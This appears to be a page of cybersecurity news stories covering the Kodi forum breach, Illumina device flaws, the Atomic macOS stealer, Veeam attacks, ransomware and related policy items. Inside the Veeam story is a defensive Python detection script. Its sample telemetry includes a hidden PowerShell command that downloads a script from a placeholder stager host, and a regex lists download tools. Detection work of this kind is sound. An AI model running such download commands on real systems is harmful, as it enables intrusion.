
Forum Database Sold Online After Kodi Data Breach

 


Hackers have breached the Kodi Foundation's MyBB forum database, stealing user information such as email addresses and private messages, which were then put up for sale online. 

Kodi itself is an open-source, cross-platform media player, organizer, and streaming suite. It supports numerous third-party add-ons that let users access and stream content from a variety of sources and customize the experience to their own preferences. 

Several months ago, the Kodi Foundation published a statement revealing that it had been breached by hackers. This was after the organization's MyBB forum database, containing user information and private messages, was stolen and sold online. 

The threat actors abused the account to create database backups, which they downloaded and then deleted. The database's existing nightly full backups were downloaded as well. A request to disable the account in question has now been submitted. 

The non-profit organization developed Kodi media center, a free and open-source software entertainment hub, and media player. According to a breach notice published on April 8, the Kodi Team learned of unauthorized access after a data dump of its forum user base (MyBB) was offered for sale online. 

The now-defunct Kodi forum had about 401,000 users who posted 3 million messages covering various topics, including video streaming, suggestions, support, sharing upcoming add-ons, and more. Hackers took over the forum database by accessing the admin interface with inactive staff credentials, according to a site statement on Saturday. 

In the aftermath of the breach, the developer has shut down the forum, which was home to over 3 million posts, and is working to perform a global password reset, since it assumes that “all passwords are compromised” despite their being stored in an encrypted format. 

In an update published earlier today, Kodi's administrators informed the community that they are commissioning an updated forum server. The existing systems do not otherwise appear to have been compromised. 

The forum will be redeployed using the latest MyBB version. This comes with a heavy workload required to incorporate custom functional changes and backport security fixes, so a delay of "several days" is to be expected. 

Kodi has shared the list of exposed email addresses associated with forum accounts with the Have I Been Pwned data breach notification service. 

Even though these passwords were hashed and salted, Kodi warns that all passwords should be viewed as compromised for the time being. Service availability may be affected when the admin team carries out the planned global password reset. 

According to Kodi's release, any sensitive information exchanged between users through the forum's user-to-user messaging system may have been compromised. If you used the same login and password on another website, follow that website's instructions for resetting or changing your password. 

On February 15th, 2023, a seller using the name Amius claimed to have sold the database dump on a hacking forum. The dump reportedly lists 400,314 Kodi forum members, including "several IPTV resellers." 

There is no information regarding the database price as the seller accepted a private offer over Telegram. The Breached forum is one of the largest hacking and data leak forums. It has developed its reputation over the past few years for hosting, leaking, and selling breaches of companies, governments, and various other organizations. 

The Threat of Deepfakes: Hacking Humans

Deepfake technology has been around for a few years, but its potential to harm individuals and organizations is becoming increasingly clear. In particular, deepfakes are becoming an increasingly popular tool for hackers and fraudsters looking to manipulate people into giving up sensitive information or making financial transactions.

One recent example of this was the creation of a deepfake video featuring a senior executive from the cryptocurrency exchange Binance. The video was created by fraudsters with the intention of tricking developers into believing they were speaking with the executive and providing them with access to sensitive information. This kind of CEO fraud can be highly effective, as it takes advantage of the trust that people naturally place in authority figures.

While deepfake technology can be used for more benign purposes, such as creating entertaining videos or improving visual effects in movies, its potential for malicious use is undeniable. This is especially true when it comes to social engineering attacks, where hackers use psychological tactics to convince people to take actions that are not in their best interest.

To prevent deepfakes from being used to "hack the humans", it is important to take a multi-layered approach to security. This includes training employees to be aware of the risks of deepfakes and how to identify them, implementing technical controls to detect and block deepfake attacks, and using threat intelligence to stay ahead of new and emerging threats.

At the same time, it is important to recognize that deepfakes are only one of many tools that hackers and fraudsters can use to target individuals and organizations. To stay protected, it is essential to maintain a strong overall security posture, including regular software updates, strong passwords, and access controls.

The most effective defense against deepfakes and other social engineering attacks is to maintain a healthy dose of skepticism and critical thinking. By being aware of the risks and taking steps to protect yourself and your organization, you can help ensure that deepfakes don't "hack the humans" and cause lasting harm.

Illumina: FDA, CISA Warns Against Security Flaw Making Medical Devices Vulnerable to Remote Hacking


The US Government has issued a warning to healthcare providers and lab employees about a critical flaw, discovered in medical devices made by the genomics giant Illumina, that could be used by threat actors to alter or steal sensitive patient medical data.

On Thursday, US cybersecurity agency CISA and US Food and Drug Administration FDA released separate advisories to alert organizations of the vulnerabilities affecting the Universal Copy Service (UCS) component used by a number of Illumina's genetic sequencing devices.

The vulnerability, identified as CVE-2023-1968, enables remote access to a vulnerable device via the internet without the need for a password. If exploited, hackers may be able to compromise devices and cause them to generate false, altered, or nonexistent results. 

The advisories also include a second vulnerability, CVE-2023-1966, which is rated 7.4 out of 10 for severity. The flaw might provide hackers access to the operating system level, where they could upload and run malicious programs to change settings and access private information on the impacted product.

The FDA claimed it was unaware of any actual attacks that exploited the flaws, but it did issue a warning that a hacker might use them to remotely control a device or change its settings, software, or data, as well as remotely access the user's network.

“On April 5, 2023, Illumina sent notifications to affected customers instructing them to check their instruments and medical devices for signs of potential exploitation of the vulnerability,” states the FDA in its notification. 

The products from Illumina that are vulnerable include iScan, iSeq, MiniSeq, MiSeq, MiSeqDx, NextSeq, and NovaSeq. These products, which are used all around the world in the healthcare industry, are made for clinical diagnostic use when sequencing a person's DNA for different genetic diseases or research needs.

According to Illumina spokesperson David McAlpine, Illumina has “not received any reports indicating that a vulnerability has been exploited, nor do we have any evidence of any vulnerabilities being exploited.” He declined to comment on whether the company has technical resources that could detect exploitation, and did not specify the number of devices affected by the vulnerability.

Illumina CTO Alex Aravanis in a LinkedIn post mentions that the company detected the flaw as part of routine efforts to examine its software for potential flaws and exposures.

“Upon identifying this vulnerability, our team worked diligently to develop mitigations to protect our instruments and customers[…]We then contacted and worked in close partnership with regulators and customers to address the issue with a simple software update at no cost, requiring little to no downtime for most,” Aravanis said.  

This New macOS Info-stealer in Town is Targeting Crypto Wallets

 

A new info-stealer malware has been identified that is designed to steal a wide range of personal data, including local files, cookies, financial information, and passwords stored in macOS browsers. It is called Atomic macOS Stealer (aka AMOS, or simply Atomic), and its developer is constantly adding new capabilities to it. 

The most recent update was issued on April 25. According to the Cyble research team, Atomic is available on a private Telegram channel for a $1,000 monthly fee. The customer receives a DMG installer file, a cryptocurrency checker, a MetaMask brute-forcing tool, and a web panel to oversee attack campaigns.

The malicious DMG file is designed to avoid detection and was flagged as malware by only one of 59 AV engines on VirusTotal. When the victim runs the DMG file, it displays a password prompt disguised as a macOS system notice, encouraging the user to enter the system password.

After getting the system password, it attempts to steal passwords stored in the default password management tool Keychain. This includes WiFi passwords, credit card information, site logins, and other critical information. Atomic is built with a variety of data-theft features, allowing its operators to target various browsers and crypto wallets, among other things.

It checks the system for installed applications in order to steal information from them. Cryptocurrency wallets (Binance, Electrum, Atomic, and Exodus) and web browsers (Google Chrome, Microsoft Edge, Firefox, Opera, Yandex, and Vivaldi) are among the programs targeted.

It also targets over 50 cryptocurrency wallet extensions, such as Coinbase, Yoroi, BinanceChain, Jaxx Liberty, and Guarda. Furthermore, it attempts to steal system information such as the Model name, RAM size, number of cores, serial number, UUID number, and others.

Atomic is another example of the growing number of cyber dangers threatening macOS. Researchers have already discovered two new threats, the RustBucket Malware and a new LockBit variation, indicating an interest in Apple's core operating system, which powers Mac computers.

As a result, it is past time for Mac users to recognise the growing threat and enhance their security posture.

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and further attacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt using telemetry from WithSecure's Endpoint Detection and Response (EDR) product, the researchers discovered Veeam servers generating suspicious alerts, such as sqlservr.exe spawning cmd.exe and PowerShell scripts being downloaded.
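The alert pattern above (sqlservr.exe spawning a shell, followed by PowerShell fetching a script) can be expressed as a small detection rule over process-creation telemetry. The following is an added example, not WithSecure's or Veeam's code; the event schema, host names, PIDs, paths and the placeholder stager URL are all constructed for the demonstration.

```python
"""Detection logic for the Veeam/FIN7 process pattern described above.

Added example (not from the original post). Events mimic a Sysmon Event ID 1
record with only the fields the rules need; all values are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    pid: int
    ppid: int
    image: str          # full path of the created process
    command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    pid: int
    rule: str
    severity: str
    detail: str


SQL_SERVER = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download primitives commonly seen when a script is fetched from the network.
DOWNLOAD_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|"
    r"start-bitstransfer|\biwr\b|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, ProcessEvent], limit: int = 32) -> List[str]:
    """Image names of the process's parents, nearest first; bounded against cycles."""
    names: List[str] = []
    ev = by_pid.get(pid)
    while ev is not None and len(names) < limit:
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.pid == ev.pid:
            break
        names.append(basename(parent.image))
        ev = parent
    return names


def evaluate(events: Iterable[ProcessEvent]) -> List[Finding]:
    """Apply both rules to a batch of events, grouping the process tree per host."""
    by_host: Dict[str, Dict[int, ProcessEvent]] = {}
    for ev in events:
        by_host.setdefault(ev.host, {})[ev.pid] = ev

    findings: List[Finding] = []
    for host, by_pid in by_host.items():
        for ev in by_pid.values():
            image = basename(ev.image)
            parents = ancestry(ev.pid, by_pid)
            direct_parent = parents[0] if parents else ""
            # Rule 1: the database engine has no business launching a shell.
            if direct_parent == SQL_SERVER and image in SHELLS:
                findings.append(Finding(host, ev.pid, "sqlservr_spawns_shell",
                                        "high", f"{direct_parent} -> {image}"))
            # Rule 2: PowerShell downloading; escalate when SQL Server is an ancestor.
            if image in POWERSHELL:
                match = DOWNLOAD_RE.search(ev.command_line)
                if match:
                    severity = "high" if SQL_SERVER in parents else "medium"
                    findings.append(Finding(host, ev.pid, "powershell_download",
                                            severity, match.group(1)))
    return findings


# Constructed sample telemetry: one malicious chain and one benign admin script.
SAMPLE_EVENTS = [
    ProcessEvent("VBR01", 800, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcessEvent("VBR01", 1200, 800,
                 r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
                 "sqlservr.exe -sVEEAMSQL"),
    ProcessEvent("VBR01", 4410, 1200, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://stager.example.invalid/a.ps1','C:\\Users\\Public\\a.ps1')\""),
    ProcessEvent("VBR01", 4422, 4410,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://stager.example.invalid/a.ps1','C:\\Users\\Public\\a.ps1')\""),
    ProcessEvent("VBR01", 3300, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent("VBR01", 5000, 3300,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\Scripts\backup-report.ps1"),
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.host} pid={f.pid} {f.rule} [{f.severity}] {f.detail}")
```

Both findings land on the malicious chain and the scheduled report script stays quiet; in production the same rules would be fed from the EDR's process events rather than the embedded sample.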

Exposure is made worse by some organizations using insecure configurations when setting up their Veeam backup servers, leaving them reachable from the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.


The Persistent Threat of Ransomware: RSA Conference 2023 Highlights

The cybersecurity industry's highest-profile annual gathering, the RSA Conference, has focused heavily on the ongoing and increasing threat of ransomware. Last year, 68% of all cyberattacks involved ransomware, according to cybersecurity firm Sophos. 

The National Security Agency's director of cybersecurity, Rob Joyce, recently confirmed that Russian hackers are now weaponizing ransomware to target Ukrainian logistics companies and organizations in Western-allied countries.

Ransomware typically begins with file-encrypting malware being installed on an organization's network, which is then followed by a ransom note displayed on every screen. Hackers demand payment, often in cryptocurrency, to unlock the networks and prevent any data leaks. In recent years, ransomware has affected schools, hospitals, small businesses, and more.

At RSA, conversations have shifted from viewing ransomware as a mere annoyance to a persistent and dangerous threat. A panel on the last day of the conference acted out a hypothetical response to an Iran-backed ransomware attack on US banks in 2025, highlighting the severity of the threat.

The shift in perspective is in response to the increasing sophistication and persistence of ransomware attacks, as well as the fact that cybercriminals have been successful in monetizing their activities. The use of cryptocurrency for payment also makes it more difficult for law enforcement to trace the source of the attacks.

Ransomware attacks are now considered to be a "forever problem," meaning they will be a persistent threat for the foreseeable future. Organizations and individuals must take proactive steps to prevent attacks, including maintaining strong security measures and regularly backing up data. It is also crucial to be vigilant for any suspicious activity and to report any potential attacks immediately to the appropriate authorities.

In conclusion, ransomware attacks continue to be a major concern for cybersecurity professionals, and their impact will only continue to grow. Organizations and individuals must be proactive in their cybersecurity measures to prevent attacks and minimize damage.

Hackers are Breaking Into AT&T to Steal Cryptocurrency

In recent news, individuals with AT&T email addresses are being targeted by unknown hackers who are using their access to break into victims' cryptocurrency exchange accounts and steal their digital assets. Cryptocurrency exchanges are online platforms that allow users to buy, sell, and trade digital currencies like Bitcoin and Ethereum. 

To use a cryptocurrency exchange, users need to create an account and provide personal information for identity verification. They can then deposit traditional currencies and use them to purchase digital currencies. 

According to an anonymous source, cybercriminals have discovered a way to gain unauthorized access to the email accounts of AT&T users, including those with email domains such as att.net, sbcglobal.net, and bellsouth.net. 

These hackers exploit a section of AT&T's internal network to create mail keys for any user. Mail keys are unique credentials that allow AT&T email users to access their accounts via email applications like Thunderbird or Outlook without using their passwords.

Once the hackers obtain a target's mail key, they use an email app to access the victim's account and reset passwords for more valuable services like cryptocurrency exchanges. This leaves the victim vulnerable, as the hackers can easily reset passwords for Coinbase or Gemini accounts via email, transferring the victim's digital assets to their own accounts and leaving the victim with nothing. 

One of the victims reported that “it is very frustrating because it is obvious that the ‘hackers’ have direct access to the database or files containing these customer Outlook keys, and the hackers don’t need to know the user’s AT&T website login to access and change these Outlook login keys”. 

AT&T spokesperson Jim Kimberly acknowledged the unauthorized creation of secure mail keys that allow access to email accounts without passwords. The company has since updated its security controls and proactively required a password reset on some email accounts. 

“We identified the unauthorized creation of secure mail keys, which can be used in some cases to access an email account without needing a password. We have updated our security controls to prevent this activity. As a precaution, we also proactively required a password reset on some email accounts,” he added. 

However, Kimberly further said that the hackers had no access to the internal systems of the company. “There was no intrusion into any system for this exploit. The bad actors used an API access.”

Amnesty International Takes a While to Disclose the Data Breach From December

 

Amnesty International Australia notified supporters via email last Friday that their data might be at risk owing to "anomalous activity" discovered in its IT infrastructure. 

The email was not only sent late in the day and late in the week, it was also sent long after the activity was discovered. The email, which Gizmodo Australia saw, states that the activity was detected towards the end of last year. 

“As soon as we became aware of this activity on 3 December 2022, we engaged leading external cyber security and forensic IT advisors to determine if any unauthorised access to our IT environment had occurred,” Amnesty International Australia stated.

“We acted quickly to ensure the AIA IT environment was secure and contained, put additional security measures in place and commenced an extensive investigation.” 

Amnesty International said that while it took the organisation some time to notify its supporters of a security breach, the investigation is now complete and has revealed that an unauthorised third party temporarily got access to its IT system. 

“In the course of this investigation, we identified that some low-risk information relating to individuals who made donations in 2019 was accessed, but of low risk of misuse,” the organisation added. 

Although "low risk" information was not defined, the security advice that accompanied the notice suggests the data is most likely names, email addresses, and phone numbers. Despite being satisfied that the information obtained through the breach won't be misused, Amnesty International Australia advised its supporters to "carefully scrutinise all emails," "don't answer calls from unknown or private numbers," and "never click on links in SMS messages or social media messages you are not expecting to receive." 

The breach only affected the local arm of the charity, according to Amnesty International Australia, and did not affect any other branches. The statement further said that although the scope of the "information accessed in the cyber event" did not meet the threshold for notification under the Notifiable Data Breaches Scheme, Amnesty International Australia had decided to notify its supporters "in the interest of transparency".

Survivors Call for Enhanced Online Protection, Wikipedia Rejects Age Checks

 


The organisation behind Wikipedia has warned that the website could become inaccessible to UK readers if it cannot comply with online safety legislation. 

The Online Safety Bill includes requirements regarding identity verification and age-gating. Wikipedia has stated that these measures are incompatible with its open, volunteer-driven nature, which is why the Wikimedia Foundation believes the bill needs to change. It says it will not restrict access to its content by the age of its users. 

Wikimedia's vice president of global advocacy, Rebecca MacKinnon, made the statement to the BBC, saying that such verification would "violate our commitment to collecting minimal data about our readers and contributors". 

As a result of the law, which will come into force in 2024, companies that offer tech services will be required to ensure users are protected from harmful or illegal content. Furthermore, it requires that services likely to be accessed by children undergo age verification to comply with the law. 

Wikimedia UK says certain Wikipedia material, including educational content about sexuality, is expected to trigger age verification at some point in the future. Complying with this requirement would mean reworking a major portion of the site's technical systems.  

A government spokesperson said that these requirements would target only those services posing the highest risk to children's safety, and Wikipedia argues that it is unlikely to fall under the strictest tier of regulation established under the bill. The foundation suggests an approach similar to that of the EU Digital Services Act, which distinguishes between a centralized moderation model driven by employees and the volunteer community model implemented by Wikipedia.  

Wikimedia figures worry that the website could be blocked due to non-compliance with the law, while the government has assured them that only high-risk services will be subject to age verification. 

In the interview, Rebecca MacKinnon from the Wikimedia Foundation further stated that the bill would violate the organization's commitment to collecting minimal information about readers and contributors. At present, Wikipedia users have no obligation to provide any information. They do not need to create a profile or verify their identity to access the content. 

Ofcom will enforce the revised regulations on websites that do not comply with them. In addition, it will impose heavy fines for breaking the revised rules. 

It is to combat this issue that Wikipedia is advocating for an 'encyclopedia exemption' under which public goods and knowledge created by the public can be protected from censorship, centralized moderation, and the kind of users that come with centralized content platforms. 

In response to updated legislation that calls for platforms to keep underage visitors off their services, the foundation announced it would not restrict access to its sites based on visitors' age.  

Despite the government's assurance that only the highest-risk content will be moderated, access to such content may be restricted to those 18 years and older, which only adds to the concern. Because Wikipedia is community-run and all of its information is openly accessible, it is not governed by a large corporation or regulated by governments in the same way as a service like Google.

Atomic macOS Malware: New Malware Steals Credit Card Credentials in Chrome


A brand-new malware has apparently been targeting macOS. The malware, according to BleepingComputer, is named “Atomic” and was being sold to cybercriminals in darknet markets for $1,000 a month. 

This ill-intentioned subscription provides a simple-to-use victim management UI that gives malicious actors access to very sensitive information, such as keychain passwords, cookies, files from the local machine, and other data that can put victims in serious trouble.

What is Atomic Capable of? 

While Atomic is an information-stealing malware, it can leave its victims considerably poorer. When cybercriminals buy Atomic, they receive a DMG file containing a 64-bit Go-based malware program that can steal credit card information from browsers. This covers Yandex, Opera, Vivaldi, Microsoft Edge, Mozilla Firefox, and Google Chrome. 

After gaining access to a victim's Mac, Atomic may show a bogus password window asking users to enter their system passwords. As a result, attackers can access the target's macOS computer and cause havoc. 

Moreover, due to the activities of Atomic, cryptocurrency holders are particularly vulnerable. More than 50 well-known cryptocurrency extensions, including Metamask and Coinbase, are intended targets of this macOS malware. 

Atomic, unfortunately, tends to go unnoticed: only one of 59 anti-virus scanners flagged it as malicious. 

How can you Protect Yourself from Atomic macOS Malware? 

Thankfully, Atomic will not be hiding in any official macOS services. Atomic is disseminated by its buyers through phishing emails, laced torrents, and social media posts. Some even use black-hat SEO to lure Google users into downloading the malware disguised as legitimate software. 

If you are a crypto holder, it is best to use a well-known crypto hardware wallet to protect yourself from digital-asset thieves. It is also advised not to rely on software wallets, since they leave valuable virtual currencies far more exposed. 

Online users have also been advised to remove their credit card information from Google Chrome by navigating to Settings > Autofill > Payment Methods, tapping the three-dotted icon next to each credit card, and clicking "Turn off virtual card." To go a step further, go to pay.google.com, select Payment Methods, and click "Remove" next to each credit card.  

Fake Reviews and Subscription Traps to be Banned Under New Bill in UK

 

As part of the modifications planned under new rules, buying, selling, or hosting bogus reviews would become unlawful. The UK government's new Digital Markets, Competition, and Consumer Bill intends to benefit consumers while increasing competition among large technology corporations. 

The bill, which was filed on Tuesday, prohibits people from obtaining money or free items in exchange for writing flattering reviews. Firms would also be required to notify customers when their free subscription trials expire. Furthermore, the bill seeks to end the current market dominance of the tech titans.

The law has been in the works since 2021. Its creators have stated that they want to oversee the way a number of large tech businesses dominate the market, though none have been expressly named yet; they will be chosen following a nine-month assessment phase.

It makes no difference where they are located, and corporations headquartered in China will be included if they are judged to be in scope. The newly established Digital Markets Unit, which will be part of the Competition and Markets Authority (CMA), will thereafter be given special powers to open up a specific market based on the circumstances.

This may involve asking Apple to allow iPhone and iPad users to download apps from various app stores, or compelling search engines to share data. The CMA will be authorized to levy fines of up to 10% of global revenue for non-compliance, depending on the infraction, and will not need a court order to enforce consumer law.

The EU Digital Markets Act was created to address similar competition difficulties with large digital corporations.

The UK bill is fairly broad, and the CMA will have to:
  • deal with the large, worldwide issue of big tech's market dominance 
  • help customers manage subscriptions, and potentially extend the "cooling off" period so they can be stopped after one payment is made 
  • ensure platforms take "reasonable steps" to verify that product and service evaluations are authentic.
After successfully forcing Meta, Facebook's parent company, to sell the graphics animation firm Giphy after ruling that it would harm competition, the CMA demonstrated that a UK regulator can be effective when tackling what are likely to be predominantly US-based behemoths. Meta was disappointed, but it did comply.

According to Reed Smith lawyer Nick Breen, the expanded powers granted to the CMA under the new bill mean that "no one has the luxury of taking this lightly." The trade organization techUK's Neil Ross expressed hope that it would feature "robust checks and balances" as well as a fast appeals mechanism.

"The new laws we're delivering today will empower the CMA to directly enforce consumer law, strengthen competition in digital markets, and ensure that people across the country keep hold of their hard-earned cash," said Business Minister Kevin Hollinrake.

Following parliamentary approval, the new rules will be implemented as soon as possible, according to the Department of Business and Trade.